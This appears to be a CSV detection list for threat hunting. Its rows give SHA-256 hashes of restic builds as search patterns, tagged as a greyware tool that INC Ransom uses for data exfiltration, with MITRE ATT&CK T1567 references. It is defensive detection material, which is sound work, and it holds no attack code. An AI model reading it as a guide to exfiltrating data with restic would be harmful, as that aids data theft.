"*2c50ac9cc40a98a74c88cc3ee248e1550464009866d44356f1db0c3cc6433903*",".{0,1000}2c50ac9cc40a98a74c88cc3ee248e1550464009866d44356f1db0c3cc6433903.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2e7585939693c87bbb35a55bdce13253747dcbab8ec4eab0e10b342ffe9148a4*",".{0,1000}2e7585939693c87bbb35a55bdce13253747dcbab8ec4eab0e10b342ffe9148a4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2e8a57f0d1d2b90d67253d1287159dc467bdb7f3b385be2db39e7213b44672be*",".{0,1000}2e8a57f0d1d2b90d67253d1287159dc467bdb7f3b385be2db39e7213b44672be.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2ec2fe545387d5c91845130aad884ee212fdf3374690dfceaa422ad7545ea7a0*",".{0,1000}2ec2fe545387d5c91845130aad884ee212fdf3374690dfceaa422ad7545ea7a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2ee2106e77f6c197ed167c064e4cd24cdca2a824c3d37805e201c9eed6c2f3a2*",".{0,1000}2ee2106e77f6c197ed167c064e4cd24cdca2a824c3d37805e201c9eed6c2f3a2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2f2d847e45c63766134c300e0fffec4acc13141b7fa23e77485e14592a933b4b*",".{0,1000}2f2d847e45c63766134c300e0fffec4acc13141b7fa23e77485e14592a933b4b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2f46c381b4f2964068e256f85f11cacdda75601cf0ef5069e08b3ed91c2f7c9c*",".{0,1000}2f46c381b4f2964068e256f85f11cacdda75601cf0ef5069e08b3ed91c2f7c9c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2f5301deb35d5d2bd0639dc172247df8b33dddb04034addf3d42c9bf2a9bacc6*",".{0,1000}2f5301deb35d5d2bd0639dc172247df8b33dddb04034addf3d42c9bf2a9bacc6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*2f81bffd408e9f57f31d9c91dd59473bbd57dd27d6e90eb582db2365bf3faf1b*",".{0,1000}2f81bffd408e9f57f31d9c91dd59473bbd57dd27d6e90eb582db2365bf3faf1b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3000e68455aa68222a46c10161ffdd921929fb2a14d5093cb4f64a569737c50c*",".{0,1000}3000e68455aa68222a46c10161ffdd921929fb2a14d5093cb4f64a569737c50c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*303d31423ac6fc64a185886ae639a9f85126cc39e4bc0c58ca1320a06cd2ac2c*",".{0,1000}303d31423ac6fc64a185886ae639a9f85126cc39e4bc0c58ca1320a06cd2ac2c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*30c290f0f1d6bb3553604c337d4a85cd38b7b5c8dc738386cda54ff740a9bb1f*",".{0,1000}30c290f0f1d6bb3553604c337d4a85cd38b7b5c8dc738386cda54ff740a9bb1f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*311a9c3ba000730148d78ed854f7235a3d05530ccfff5a868cb6357ec93b83c3*",".{0,1000}311a9c3ba000730148d78ed854f7235a3d05530ccfff5a868cb6357ec93b83c3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*31339090e3e8a044d014b9341c025cf59bf7bc133ae267bc5acdea5ac07837a9*",".{0,1000}31339090e3e8a044d014b9341c025cf59bf7bc133ae267bc5acdea5ac07837a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*32273bc91ff97d985a6a1e97037b9e3814f87db6b1751201e94594ee49bdb808*",".{0,1000}32273bc91ff97d985a6a1e97037b9e3814f87db6b1751201e94594ee49bdb808.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*327426b8391497fc97c5d0fd0ccc9107cb3e2c2c2c25c5c8d3d7bf138ebfebe8*",".{0,1000}327426b8391497fc97c5d0fd0ccc9107cb3e2c2c2c25c5c8d3d7bf138ebfebe8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*328dac26bf8b47c20c4525f0c4c21f17857c1606355dc42362d37be5d3d4c95b*",".{0,1000}328dac26bf8b47c20c4525f0c4c21f17857c1606355dc42362d37be5d3d4c95b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*32de5f522092e4dd545d064e7bc2db58244200af33559bc7190d18c93edbc397*",".{0,1000}32de5f522092e4dd545d064e7bc2db58244200af33559bc7190d18c93edbc397.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3365e35e064a5dc3720c596dbc64c56f8cf6d079b30085f2ff7a148e7ebc6e55*",".{0,1000}3365e35e064a5dc3720c596dbc64c56f8cf6d079b30085f2ff7a148e7ebc6e55.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*349eb981d2d5b1f4b16127d6a0c07929ff6851d15f816a9d09ff71154743a9e1*",".{0,1000}349eb981d2d5b1f4b16127d6a0c07929ff6851d15f816a9d09ff71154743a9e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*34f4d439f01d02cf9b4d3f840375af6f2ef130e70730cf45f3989f9349c65326*",".{0,1000}34f4d439f01d02cf9b4d3f840375af6f2ef130e70730cf45f3989f9349c65326.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*35396671b32a78b457168a6413a2e0c7818e8ae740905eb273c0198f051e930f*",".{0,1000}35396671b32a78b457168a6413a2e0c7818e8ae740905eb273c0198f051e930f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*359d3b8e555a9952f2b98c81ee3dbec8dc441e12789c436ca564762aaacec095*",".{0,1000}359d3b8e555a9952f2b98c81ee3dbec8dc441e12789c436ca564762aaacec095.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*35e6e7e783afa5c5397acfde3b9237a5b1ace0cf4d0d3bf3f2d77ff601cd5157*",".{0,1000}35e6e7e783afa5c5397acfde3b9237a5b1ace0cf4d0d3bf3f2d77ff601cd5157.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3631e3c3833c84ba71f22ea3df20381676abc7476a7f6d14424d9abfada91414*",".{0,1000}3631e3c3833c84ba71f22ea3df20381676abc7476a7f6d14424d9abfada91414.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*36b87e150926457e25e95098f2f386f63f43c2aee5d30275582e6ba044de4003*",".{0,1000}36b87e150926457e25e95098f2f386f63f43c2aee5d30275582e6ba044de4003.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*370485cb64eca360249e7232e2b0400a5d1d0c937f91e8bcc7b1d545eb23a162*",".{0,1000}370485cb64eca360249e7232e2b0400a5d1d0c937f91e8bcc7b1d545eb23a162.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*37dbd859160bbb6d1b95e9f4a5c498c8df386db510950875c70328f688cb4e5d*",".{0,1000}37dbd859160bbb6d1b95e9f4a5c498c8df386db510950875c70328f688cb4e5d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*38022b590f11207be34e2eb14ab67b85774ee27d3f9903460173f1d1b77db6de*",".{0,1000}38022b590f11207be34e2eb14ab67b85774ee27d3f9903460173f1d1b77db6de.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*391432015104d8987eb9bce325017b71f6343d8ca970c94b81374aca7aa5035f*",".{0,1000}391432015104d8987eb9bce325017b71f6343d8ca970c94b81374aca7aa5035f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*394a6568c9b0e5de222256451e18de4e5b9379b058cb9fb3b04ae66c45354e16*",".{0,1000}394a6568c9b0e5de222256451e18de4e5b9379b058cb9fb3b04ae66c45354e16.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3990b68a8b0de116612ecfe7b85690659aad1ef779c606b0b6d928c402f3d821*",".{0,1000}3990b68a8b0de116612ecfe7b85690659aad1ef779c606b0b6d928c402f3d821.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*39b615a36a5082209a049cce188f0654c6435f0bc4178b7663672334594f10fe*",".{0,1000}39b615a36a5082209a049cce188f0654c6435f0bc4178b7663672334594f10fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3a379eedcb90ad0ec60a24c89f9892eb7a12ddb8a28045e432fc2c43e7faa186*",".{0,1000}3a379eedcb90ad0ec60a24c89f9892eb7a12ddb8a28045e432fc2c43e7faa186.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3a7686526b309fdfe287a88e49efb56bc9dfe5c5e02e78b4f09a942cfb2de7d0*",".{0,1000}3a7686526b309fdfe287a88e49efb56bc9dfe5c5e02e78b4f09a942cfb2de7d0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3b5f8f9ea98033c46c65edd222a676b5844186114ada1d91a56c58b0abcd0612*",".{0,1000}3b5f8f9ea98033c46c65edd222a676b5844186114ada1d91a56c58b0abcd0612.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3c63b475a56cfb3569784a78f7e712843d096779fa5b1984bdef0cebb2c31437*",".{0,1000}3c63b475a56cfb3569784a78f7e712843d096779fa5b1984bdef0cebb2c31437.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3c748064aa6d61727905c9ecd3be96b282448ae9c13368f836834ab0b49ad6e1*",".{0,1000}3c748064aa6d61727905c9ecd3be96b282448ae9c13368f836834ab0b49ad6e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3c7522dd19a1d8341e33c910afe1a84d8b9dda03de6d2cddbfb145f401e56a33*",".{0,1000}3c7522dd19a1d8341e33c910afe1a84d8b9dda03de6d2cddbfb145f401e56a33.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3c882962fc07f611a6147ada99c9909770d3e519210fd483cde9609c6bdd900c*",".{0,1000}3c882962fc07f611a6147ada99c9909770d3e519210fd483cde9609c6bdd900c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3cc1f7c3389f4f9d9f67dc0c0bf9a12d1ef413edc6b3c770f5faa5cd6e275dfe*",".{0,1000}3cc1f7c3389f4f9d9f67dc0c0bf9a12d1ef413edc6b3c770f5faa5cd6e275dfe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3d4d43c169a9e28ea76303b1e8b810f0dcede7478555fdaa8959971ad499e324*",".{0,1000}3d4d43c169a9e28ea76303b1e8b810f0dcede7478555fdaa8959971ad499e324.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3e8a768889dd85d952fc7160d196c68866c9155383b0347c4049d079c8ae2cdd*",".{0,1000}3e8a768889dd85d952fc7160d196c68866c9155383b0347c4049d079c8ae2cdd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3e9460a86fa16e9273c3a09f4cefccfd6e9a27ece4836fe2c3409593ba24c21f*",".{0,1000}3e9460a86fa16e9273c3a09f4cefccfd6e9a27ece4836fe2c3409593ba24c21f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3f01015707ba586af211445b24c078088e888e1d496776d2290c85ced4c0fc8d*",".{0,1000}3f01015707ba586af211445b24c078088e888e1d496776d2290c85ced4c0fc8d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3f031af58b8b614eafe0fbefb338542b7b04f878853fa9f62394a00923375735*",".{0,1000}3f031af58b8b614eafe0fbefb338542b7b04f878853fa9f62394a00923375735.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3f3ebac013334cb9fd5d1f4556c67ed3e663338b72b48dce0ec0ee774690a8c5*",".{0,1000}3f3ebac013334cb9fd5d1f4556c67ed3e663338b72b48dce0ec0ee774690a8c5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3fe6bb27a84dc5b565f2a31d2297497df75af2da88390e0b893ef90cae605a23*",".{0,1000}3fe6bb27a84dc5b565f2a31d2297497df75af2da88390e0b893ef90cae605a23.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*3fee12f2bf405e28cc35e8fe8379d9d73345a79ee8347f4928701158495bb266*",".{0,1000}3fee12f2bf405e28cc35e8fe8379d9d73345a79ee8347f4928701158495bb266.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*40862cc6300a8460151fc4adda2d95bfc405f581919c0732ef654cf22a99584f*",".{0,1000}40862cc6300a8460151fc4adda2d95bfc405f581919c0732ef654cf22a99584f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*40d9fe8c9f191ab5d0f3e172eadac4fb3aef7a698b895a22ce81102b0a0f270a*",".{0,1000}40d9fe8c9f191ab5d0f3e172eadac4fb3aef7a698b895a22ce81102b0a0f270a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*411e557dd4765d49299e45c2c6700f436da20c1e455dffa36406bd841b5863c9*",".{0,1000}411e557dd4765d49299e45c2c6700f436da20c1e455dffa36406bd841b5863c9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*41cc6ad3ac5e99ee088011f628fafcb4fa1e4d3846be2333e5c2a3f6143cd0c1*",".{0,1000}41cc6ad3ac5e99ee088011f628fafcb4fa1e4d3846be2333e5c2a3f6143cd0c1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*41d0b1d19e7427cca350e9079cd4c52145d6c1bc4c9f89d1b9b7328ceeaa9d26*",".{0,1000}41d0b1d19e7427cca350e9079cd4c52145d6c1bc4c9f89d1b9b7328ceeaa9d26.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*41d47f100f61c503c462f53069e5c2aaad4dafec461e56b85b1de7730e4f9c4d*",".{0,1000}41d47f100f61c503c462f53069e5c2aaad4dafec461e56b85b1de7730e4f9c4d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*41dcb500cafd238bee5efab4de53eaca0c22bb5d504c4ef5e2672b91c341c5e4*",".{0,1000}41dcb500cafd238bee5efab4de53eaca0c22bb5d504c4ef5e2672b91c341c5e4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*421df18208f862250939213750c7573b4880fc0583a46d757e039e615bc60877*",".{0,1000}421df18208f862250939213750c7573b4880fc0583a46d757e039e615bc60877.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4231518d2e5ed5fa9f486f6259367e6cf82e850b19842e8c4f801bba4ed781be*",".{0,1000}4231518d2e5ed5fa9f486f6259367e6cf82e850b19842e8c4f801bba4ed781be.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4241fd63136c5f19a197d232b8be95e88b06dd9d2052c950404dd6567d922ab7*",".{0,1000}4241fd63136c5f19a197d232b8be95e88b06dd9d2052c950404dd6567d922ab7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4255a5579488169942100c59340c13cd7c7918ee2ef75efee8f237a7996f2c7f*",".{0,1000}4255a5579488169942100c59340c13cd7c7918ee2ef75efee8f237a7996f2c7f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*42697577979dbc80eb0f7506f4e515fcb22ef731e4199c33d98c450ed73967ac*",".{0,1000}42697577979dbc80eb0f7506f4e515fcb22ef731e4199c33d98c450ed73967ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*426eb5437d5f204ca5788afd05e3f8e5ead876235bb6182b06a03c353bdaf8c7*",".{0,1000}426eb5437d5f204ca5788afd05e3f8e5ead876235bb6182b06a03c353bdaf8c7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*42a758228141c7215bd913352516e8ab1e02c9f786e1f4076f7c1d245e9815b0*",".{0,1000}42a758228141c7215bd913352516e8ab1e02c9f786e1f4076f7c1d245e9815b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*42ab238bd96334665442e896141ba5e9aca31b2a27d672f7a6f111be1f825611*",".{0,1000}42ab238bd96334665442e896141ba5e9aca31b2a27d672f7a6f111be1f825611.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
